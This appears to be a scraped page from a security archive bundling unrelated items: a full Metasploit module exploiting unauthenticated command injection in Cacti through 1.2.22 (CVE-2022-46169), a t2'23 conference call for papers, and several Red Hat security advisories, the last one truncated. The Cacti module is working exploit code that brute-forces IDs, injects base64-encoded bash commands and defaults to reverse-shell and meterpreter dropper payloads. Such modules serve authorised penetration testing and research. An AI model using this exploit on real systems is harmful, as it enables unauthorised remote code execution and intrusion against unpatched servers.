This Metasploit module exploits an unauthenticated command injection vulnerability in Cacti versions through 1.2.22 in order to achieve unauthenticated remote code execution as the www-data user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Cacti 1.2.22 unauthenticated command injection',        'Description' => %q{          This module exploits an unauthenticated command injection          vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in          order to achieve unauthenticated remote code execution as the          www-data user.          The module first attempts to obtain the Cacti version to see          if the target is affected. If LOCAL_DATA_ID and/or HOST_ID          are not set, the module will try to bruteforce the missing          value(s). If a valid combination is found, the module will          use these to attempt exploitation. If LOCAL_DATA_ID and/or          HOST_ID are both set, the module will immediately attempt          exploitation.          During exploitation, the module sends a GET request to          /remote_agent.php with the action parameter set to polldata          and the X-Forwarded-For header set to the provided value for          X_FORWARDED_FOR_IP (by default 127.0.0.1). In addition, the          poller_id parameter is set to the payload and the host_id          and local_data_id parameters are set to the bruteforced or          provided values. If X_FORWARDED_FOR_IP is set to an address          that is resolvable to a hostname in the poller table, and the          local_data_id and host_id values are vulnerable, the payload          set for poller_id will be executed by the target.          This module has been successfully tested against Cacti          version 1.2.22 running on Ubuntu 21.10 (vulhub docker image)        },        'License' => MSF_LICENSE,        'Author' => [          'Stefan Schiller', # discovery (independent of Steven Seeley)          'Steven Seeley', # (mr_me) @steventseeley - discovery (independent of Stefan Schiller)          'Owen Gong', # @phithon_xg - vulhub PoC          'Erik Wynter' # @wyntererik - Metasploit        ],        'References' => [          ['CVE', '2022-46169'],          ['URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf'], # disclosure and technical details          ['URL', 'https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169'], # vulhub vulnerable docker image and PoC          ['URL', 'https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution'] # analysis by Stefan Schiller        ],        'DefaultOptions' => {          'RPORT' => 8080        },        'Platform' => %w[unix linux],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Automatic (Unix In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },              'Type' => :unix_memory            }          ],          [            'Automatic (Linux Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'CmdStagerFlavor' => ['echo', 'printf', 'wget', 'curl'],              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },              'Type' => :linux_dropper            }          ]        ],        'Privileged' => false,        'DisclosureDate' => '2022-12-05',        'DefaultTarget' => 1,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The base path to Cacti', '/']),      OptString.new('X_FORWARDED_FOR_IP', [true, 'The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.', '127.0.0.1']),      OptInt.new('HOST_ID', [false, 'The host_id value to use. By default, the module will try to bruteforce this.']),      OptInt.new('LOCAL_DATA_ID', [false, 'The local_data_id value to use. By default, the module will try to bruteforce this.'])    ])    register_advanced_options([      OptInt.new('MIN_HOST_ID', [true, 'Lower value for the range of possible host_id values to check for', 1]),      OptInt.new('MAX_HOST_ID', [true, 'Upper value for the range of possible host_id values to check for', 5]),      OptInt.new('MIN_LOCAL_DATA_ID', [true, 'Lower value for the range of possible local_data_id values to check for', 1]),      OptInt.new('MAX_LOCAL_DATA_ID', [true, 'Upper value for the range of possible local_data_id values to check for', 100])    ])  end  def check    # sanity check to see if the target is likely Cacti    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    })    unless res      return CheckCode::Unknown('Connection failed.')    end    unless res.code == 200 && res.body.include?('<title>Login to Cacti')      return CheckCode::Safe('Target is not a Cacti application.')    end    # get the version    version = res.body.scan(/Version (.*?) \| \(c\)/)&.flatten&.first    if version.blank?      return CheckCode::Detected('Could not determine the Cacti version: the HTTP response body did not match the expected format.')    end    begin      if Rex::Version.new(version) <= Rex::Version.new('1.2.22')        return CheckCode::Appears("The target is Cacti version #{version}")      else        return CheckCode::Safe("The target is Cacti version #{version}")      end    rescue StandardError => e      return CheckCode::Unknown("Failed to obtain a valid Cacti version: #{e}")    end  end  def exploitable_rrd_names    [      'apache_total_kbytes',      'apache_total_hits',      'apache_total_hits',      'apache_total_kbytes',      'apache_cpuload',      'boost_avg_size',      'boost_peak_memory',      'boost_records',      'boost_table',      'ExportDuration',      'ExportGraphs',      'syslogRuntime',      'tholdRuntime',      'polling_time',      'uptime',    ]  end  def brute_force_ids    # perform a sanity check first    if @host_id      host_ids = [@host_id]    else      if datastore['MAX_HOST_ID'] < datastore['MIN_HOST_ID']        fail_with(Failure::BadConfig, 'The value for MAX_HOST_ID is lower than MIN_HOST_ID. This is impossible')      end      host_ids = (datastore['MIN_HOST_ID']..datastore['MAX_HOST_ID']).to_a    end    if @local_data_id      local_data_ids = [@local_data_ids]    else      if datastore['MAX_LOCAL_DATA_ID'] < datastore['MIN_LOCAL_DATA_ID']        fail_with(Failure::BadConfig, 'The value for MAX_LOCAL_DATA_ID is lower than MIN_LOCAL_DATA_ID. This is impossible')      end      local_data_ids = (datastore['MIN_LOCAL_DATA_ID']..datastore['MAX_LOCAL_DATA_ID']).to_a    end    # lets make sure the module never performs more than 1,000 possible requests to try and bruteforce host_id and local_data_id    max_attempts = host_ids.length * local_data_ids.length    if max_attempts > 1000      fail_with(Failure::BadConfig, 'The number of possible HOST_ID and LOCAL_DATA_ID combinations exceeds 1000. Please limit this number by adjusting the MIN and MAX options for both parameters.')    end    potential_targets = []    request_ct = 0    print_status("Trying to bruteforce an exploitable host_id and local_data_id by trying up to #{max_attempts} combinations")    host_ids.each do |h_id|      print_status("Enumerating local_data_id values for host_id #{h_id}")      local_data_ids.each do |ld_id|        request_ct += 1        print_status("Performing request #{request_ct}...") if request_ct % 25 == 0        res = send_request_cgi(remote_agent_request(ld_id, h_id, rand(1..1000)))        unless res          print_error('No response received. Aborting bruteforce')          return nil        end        unless res.code == 200          print_error("Received unexpected response code #{res.code}. This shouldn't happen. Aborting bruteforce")          return nil        end        begin          parsed_response = JSON.parse(res.body)        rescue JSON::ParserError          print_error("The response body is not in valid JSON format. This shouldn't happen. Aborting bruteforce")          return nil        end        unless parsed_response.is_a?(Array)          print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")          return nil        end        # the array can be empty, which is not an error but just means the local_data_id is not exploitable        next if parsed_response.empty?        first_item = parsed_response.first        unless first_item.is_a?(Hash) && ['value', 'rrd_name', 'local_data_id'].all? { |key| first_item.keys.include?(key) }          print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")          return nil        end        # some data source types that can be exploited have a valid rrd_name. these are included in the exploitable_rrd_names array        # if we encounter one of these, we should assume the local_data_id is exploitable and try to exploit it        # in addition, some data source types have an empty rrd_name but are still exploitable        # however, if the rrd_name is blank, the only way to verify if a local_data_id value corresponds to an exploitable data source, is to actually try and exploit it        # instead of trying to exploit all potential targets of the latter category, let's just save these and print them at the end        # then the user can try to exploit them manually by setting the HOST_ID and LOCAL_DATA_ID options        rrd_name = first_item['rrd_name']        if rrd_name.empty?          potential_targets << [h_id, ld_id]        elsif exploitable_rrd_names.include?(rrd_name)          print_good("Found exploitable local_data_id #{ld_id} for host_id #{h_id}")          return [h_id, ld_id]        else          next # if we have a valid rrd_name but it's not in the exploitable_rrd_names array, we should move on        end      end    end    return nil if potential_targets.empty?    # inform the user about potential targets    print_warning("Identified #{potential_targets.length} host_id - local_data_id combination(s) that may be exploitable, but could not be positively identified as such:")    potential_targets.each do |h_id, ld_id|      print_line("\thost_id: #{h_id} - local_data_id: #{ld_id}")    end    print_status('You can try to exploit these by manually configuring the HOST_ID and LOCAL_DATA_ID options')    nil  end  def execute_command(cmd, _opts = {})    # use base64 encoding to get around special char limitations    cmd = "`echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/bash`"    send_request_cgi(remote_agent_request(@local_data_id, @host_id, cmd), 0)  end  def exploit    @host_id = datastore['HOST_ID'] if datastore['HOST_ID'].present?    @local_data_id = datastore['LOCAL_DATA_ID'] if datastore['LOCAL_DATA_ID'].present?    unless @host_id && @local_data_id      brute_force_result = brute_force_ids      unless brute_force_result        fail_with(Failure::NoTarget, 'Failed to identify an exploitable host_id - local_data_id combination.')      end      @host_id, @local_data_id = brute_force_result    end    if target.arch.first == ARCH_CMD      print_status('Executing the payload. This may take a few seconds...')      execute_command(payload.encoded)    else      execute_cmdstager(background: true)    end  end  def remote_agent_request(ld_id, h_id, poller_id)    {      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'remote_agent.php'),      'headers' => {        'X-Forwarded-For' => datastore['X_FORWARDED_FOR_IP']      },      'vars_get' => {        'action' => 'polldata',        'local_data_ids[0]' => ld_id,        'host_id' => h_id,        'poller_id' => poller_id # when bruteforcing, this is a random number, but during exploitation this is the payload      }    }  endend

Cacti 1.2.22 Command Injection

The t2'23 Call For Papers has been announced. It will take place May 4th through the 5th, 2023 in Helsinki, Finland.

    Call For Papers 2023Tired of your bosses suspecting conference trips to exotic locations being just a ploy to partake in Security Vacation Club? Prove them wrong by coming to Helsinki, Finland on May 4-5 2023! Guaranteed lack of sunburn, good potential for rain or slush. In case of great spring weather, though, no money back.CFP and registration both open. Read further if still unsure.Maui, Miami, Las Vegas, Tel Aviv or Wellington feel so much sunnier once you’ve experienced the lack of infinity pools in Northern Europe. Instead of pools and palms trees, we can offer you actual saunas and a high tech environment, which is a weird combination of demoscene, widespread Linux adoption, mobile Internet with uncapped flat rate data and a long history of IRC and imageboards.What defines a conference? For t2 it has always been that intimate welcoming atmosphere of a small event, which makes both audience and speakers approachable. There are enough regulars to create the feeling of a community, but not too many that a first-comer would feel being left out. On the content side, we have always been and always will be a technical security conference, emphasizing the cutting edge, world class research. This is an event for the community. Our focus[1] is on technical excellence, not politics or player hating.t2’23 offers you an audience with a taste for technical security presentations containing original content. This is your chance to showcase the latest research and lessons in EDR simulation and healthcheck spoofing, hardware insecurity, inferring information from interference, cloud-scale forensics or persistance automation, new vulnerability classes, AI exploitation, virtual machines inside parsers, elegant exploitation of old vulnerability classes, modern defense, dropping zero days during presentations, state of the art memory corruption mitigation bypasses, evasions, safe cracking, satellite and space security, remote vehicle access, or whatever research lights up the eyes of seasoned conference visitors. For the hackers by the hackers.The advisory board will be reviewing submissions until 2023-03-17. Slide deck submission final deadline 2023-04-20 for accepted talks.First come, first served. Submissions will not be returned.Quick facts for speakers+ presentation length 60-120 minutes, in English+ complimentary travel and accommodation for one person[6]+ decent speaker hospitality benefits+ no marketing or product propagandaStill not sure if this is for you? Check out the blast from the past[2].The total amount of attendees, including speakers and organizers is limited to 99. Advisory Board recognize[3] the OG Finnish sauna culture is an acquired taste and can promise the lack of sweaty, partially or fully nude sauna-goers at all conference functions.[0] hunter2[1] https://t2.fi/about/eula/[2] https://t2.fi/schedules/[3] https://youtu.be/Oj8JBBAM5jY?t=40[6] except literally @nudehaberdasher and @0xcharlieHow to submitFill out the form at https://if.t2.fi/action/cfpHow to registerBuy your ticket at https://t2.fi/registration/

t2'23 Call For Papers

Red Hat Security Advisory 2023-0396-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:0396-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0396  
Issue date:        2023-01-24  
CVE Names:         CVE-2022-2964  
====================================================================  
1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: memory corruption in AX88179_178A based USB ethernet device.  
(CVE-2022-2964)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2067482 - CVE-2022-2964 kernel: memory corruption in AX88179_178A based USB ethernet device.

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
kpatch-patch-4_18_0-193_87_1-1-3.el8_2.src.rpm  
kpatch-patch-4_18_0-193_90_1-1-3.el8_2.src.rpm  
kpatch-patch-4_18_0-193_91_1-1-3.el8_2.src.rpm  
kpatch-patch-4_18_0-193_93_1-1-2.el8_2.src.rpm  
kpatch-patch-4_18_0-193_95_1-1-1.el8_2.src.rpm

ppc64le:  
kpatch-patch-4_18_0-193_87_1-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_87_1-debuginfo-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_87_1-debugsource-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_90_1-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_90_1-debuginfo-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_90_1-debugsource-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-debuginfo-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-debugsource-1-1.el8_2.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-193_87_1-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_87_1-debuginfo-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_87_1-debugsource-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_90_1-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_90_1-debuginfo-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_90_1-debugsource-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-debuginfo-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-debugsource-1-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2964  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY8+0NNzjgjWX9erEAQggsRAAjDjX7SS69cm4vKXiyV+nbJ3vjugudA1Y  
ctegziR7p+XpI16UZTba1+zx+VqhTEtCC9gC2rrTziw0RRnN5DYRvd45A3UY9fwc  
ehCUJi5jq0e797yeFlMrbWQ+5OW6j78uhyWNvhbKO+R7Du++tNrHEjUAd9Gs6O7+  
LRTYOvZ7Q9QSWe1dGNir8ZS1G7Mm63jRHFXqlnF1NW34T+HpqpJ896Ej4oAMPzoA  
vOMjIuU46L7bOZ0uyJZfzCi1lLP2SaaCxADHeUprOriVwb8NanAaitxJpCmUstoQ  
nKhmUMH3M2SnspTJexOHkDDdIX56On1s2xpoHw9Niwc7fFpfilELRqqXIe5LxRrP  
vnVyBR1jlwrZaxdvdhVtSG7BgWVHlC+EIiJcrE9EBrO2Ed9n31JB4J7/BDHF0+Os  
dVhDEPhRqVH0Tk6dR6thTa5Y8K2WyPiByOkOZ2AZo8gsHVvsvnFUJzLd7gFil7vV  
Wg1HqMy6ly0iMzDjasv5jXDHo4Jg9RtAZCeZTvKXJ2feV0xzvUdUcDKoCB6EDENn  
7MtiNWoG9h0IQQjbkOgeXHk6dUdyzbzLElEp7cgUDAJIFwgL+E1XaS2XZNqneLzK  
V/OV6+bpDZ8Zu1oYsXxl2S+4qeyEUEKeezOf5EuzMkHg+H8iOu4Nvp9zpPEk5xdp  
Wf+TKT8ftdk=1GZm  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0396-01

Red Hat Security Advisory 2023-0397-01 - The System Security Services Daemon service provides a set of daemons to manage access to remote directories and authentication mechanisms. It also provides the Name Service Switch and the Pluggable Authentication Modules interfaces toward the system, and a pluggable back-end system to connect to multiple different account sources.

Red Hat Security Advisory 2023-0397-01

Red Hat Security Advisory 2023-0203-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. Issues addressed include a deserialization vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:0203-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0203  
Issue date:        2023-01-24  
CVE Names:         CVE-2023-21830 CVE-2023-21843  
====================================================================  
1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper restrictions in CORBA deserialization (Serialization,  
8285021) (CVE-2023-21830)

* OpenJDK: soundbank URL remote loading (Sound, 8293742) (CVE-2023-21843)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Prepare for the next quarterly OpenJDK upstream release (2023-01, 8u362)  
(BZ#2150191)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2150191 - Prepare for the next quarterly OpenJDK upstream release (2023-01, 8u362) [rhel-7.9.z]  
2160475 - CVE-2023-21843 OpenJDK: soundbank URL remote loading (Sound, 8293742)  
2160490 - CVE-2023-21830 OpenJDK: improper restrictions in CORBA deserialization (Serialization, 8285021)

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.src.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.362.b08-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.362.b08-1.el7_9.noarch.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.src.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.362.b08-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.362.b08-1.el7_9.noarch.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.src.rpm

ppc64:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.ppc64.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.362.b08-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.362.b08-1.el7_9.noarch.rpm

ppc64:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.ppc64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.ppc64.rpm

ppc64le:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.s390x.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.src.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b08-1.el7_9.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b08-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.362.b08-1.el7_9.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.362.b08-1.el7_9.noarch.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.i686.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b08-1.el7_9.x86_64.rpm  
